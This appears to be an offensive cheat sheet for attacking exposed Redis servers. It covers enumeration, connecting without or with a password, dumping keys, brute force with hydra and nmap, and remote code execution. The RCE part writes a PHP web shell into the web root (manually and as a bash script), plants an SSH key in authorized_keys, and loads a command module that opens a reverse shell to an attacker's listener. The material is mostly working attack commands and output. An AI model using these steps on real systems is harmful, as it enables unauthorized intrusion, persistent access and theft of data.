Information

Default Port: 6379

PORT     STATE SERVICE
6379/tcp open  redis                                                                                                       

Enumeration

nc -vn 192.168.1.2 6379
timeout 0.1 bash -c "nc -nv 192.168.1.2 6379"

nmap -p6379 -sS 192.168.1.2
nmap -p6379 -sVC 192.168.1.2
nmap -p6379 --script="redis-info" 192.168.1.2

msf> use auxiliary/scanner/redis/redis_server

Connect

IPv4

# apt-get install redis-tools -y

# guest (no password)
redis-cli                                 # localhost
redis-cli -h 127.0.0.1 -p 1234            # localhost (other port)
redis-cli -h 192.168.1.2                  # remote
redis-cli -h 192.168.1.2 -p 1234          # remote (other port)

# password
redis-cli -h 192.168.1.2                  # interactive mode
192.168.1.2:6379> INFO
NOAUTH Authentication required.
192.168.1.2:6379> AUTH admin1234
OK

redis-cli -h 127.0.0.1 -a admin1234       # one liner

IPv6

redis-cli -h 2a02:2e02:97c0:b500:a00:27ff:fe2f:6a09
redis-cli -h 2a02:2e02:97c0:b500:a00:27ff:fe2f:6a09 -p1234

Usage

PING                                  # check connection
PONG

INFO
CLIENT LIST
CONFIG GET *
CONFIG GET DIR                        # show the current dump directory
CONFIG SET DIR "/dev/shm/"            # change the dump directory
SAVE                                  # write the RDB dump to disk

MODULE LIST                           # show modules
MODULE LOAD "/dev/shm/module.so"      # load module

system.exec id                        # execute commands with module (module.so)

SELECT 0                              # select database 0
SELECT 1                              # select database 1
SELECT 2                              # select database 2
KEYS *                                # list all keys in the selected database
hits
GET hits                              # get the value of the key hits
MGET peter john ben                   # get the values of the keys peter john ben
127.0.0.1:6379> KEYS *
1) "secret"
127.0.0.1:6379> GET "secret"
"ben:Password123"

Brute Force

hydra -t 64 redis://192.168.1.2 -P rockyou.txt            # default port
hydra -t 64 redis://192.168.1.2:1234 -P rockyou.txt       # other port

nmap -p6379 --script="redis-brute" 192.168.1.2

RCE

HTTP

Manual

redis-cli -h 192.168.1.2
192.168.1.2:6379> config set dir /var/www/html
OK
192.168.1.2:6379> config set dbfilename cmd.php
OK
192.168.1.2:6379> set cmd "<?php system($_GET['cmd']); ?>"
OK
192.168.1.2:6379> save
OK

Auto

#!/bin/bash
#
# Writes a PHP web shell into the web root of a Redis instance that accepts
# unauthenticated CONFIG SET and SAVE: the stored value is persisted as the
# RDB dump file "cmd.php" under "/var/www/html". This is the scripted form
# of the interactive sequence shown under "Manual" above.
#
# Why it works (each point is a hardening item for defenders): Redis is
# reachable over the network without a password, CONFIG has not been
# disabled, and the Redis process can write to the web root. A CONFIG SET
# dir / dbfilename followed by SAVE from a remote client is a clear
# detection signature in Redis command logging.
#
# NOTE(review): none of the redis-cli exit codes are checked below, so a
# NOAUTH reply or a rejected CONFIG command goes unnoticed and the script
# still exits 0.

# apt install -y redis-tools

rhost="192.168.1.2"   # CHANGE THIS  (target host)
rport="6379"          # CHANGE THIS  (target port)

# Empty every database first so the dump contains only the payload key.
redis-cli -h ${rhost} -p ${rport} flushall
sleep 0.3   # short pause between commands; presumably to avoid racing the server
# Store the PHP payload under key "cmd" (-x reads the value from stdin).
echo '<?php system($_GET["cmd"]); ?>' | redis-cli -h ${rhost} -p ${rport} -x set cmd
sleep 0.3
# Point the RDB dump directory at the web root ...
redis-cli -h ${rhost} -p ${rport} config set dir "/var/www/html"
sleep 0.3
# ... and name the dump file so the web server executes it as PHP.
redis-cli -h ${rhost} -p ${rport} config set dbfilename "cmd.php"
sleep 0.3
# SAVE writes the dump synchronously, creating /var/www/html/cmd.php.
redis-cli -h ${rhost} -p ${rport} save
sleep 0.3
exit 0

SSH

cd /root/.ssh
ssh-keygen -t rsa
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > spaced_key.txt
cat spaced_key.txt | redis-cli -h 192.168.1.2 -x set ssh_key
redis-cli -h 192.168.1.2
192.168.1.2:6379> config set dir /home/d4t4s3c/.ssh/
OK
192.168.1.2:6379> config set dbfilename "authorized_keys"
OK
192.168.1.2:6379> save
OK

Module

https://github.com/n0b0dyCN/RedisModules-ExecuteCommand

# attacker
git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
cd RedisModules-ExecuteCommand
make
# upload module.so to the victim
MODULE LIST                       # list modules
MODULE LOAD /srf/ftp/module.so    # load module.so

192.168.1.95:6379> system.exec id
"uid=1000(ben) gid=1000(ben) grupos=1000(ben)\n"

nc -lvnp 443
192.168.1.95:6379> system.rev 192.168.1.10 443